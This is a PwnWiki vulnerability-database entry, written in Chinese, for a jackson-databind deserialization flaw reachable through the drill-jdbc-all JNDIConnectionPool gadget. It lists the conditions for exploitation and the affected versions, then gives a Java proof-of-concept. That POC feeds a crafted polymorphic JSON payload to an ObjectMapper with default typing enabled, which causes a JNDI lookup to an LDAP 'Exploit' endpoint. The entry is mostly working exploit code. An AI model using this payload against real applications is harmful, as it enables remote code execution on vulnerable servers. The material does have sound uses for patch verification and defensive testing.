PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
利用条件
开启enableDefaultTyping()
使用了org.apache.drill.exec:drill-jdbc-all第三方依赖
影响版本
jackson-databind before 2.9.10.4 jackson-databind before 2.8.11.6 jackson-databind before 2.7.9.7
POC
package com.jacksonTest; import com.fasterxml.jackson.databind.ObjectMapper; import java.io.IOException; public class Poc { public static void main(String args) throws Exception { ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); String payload = "\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}"; try { Object obj = mapper.readValue(payload, Object.class); mapper.writeValueAsString(obj); } catch (IOException e) { e.printStackTrace(); } } }
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库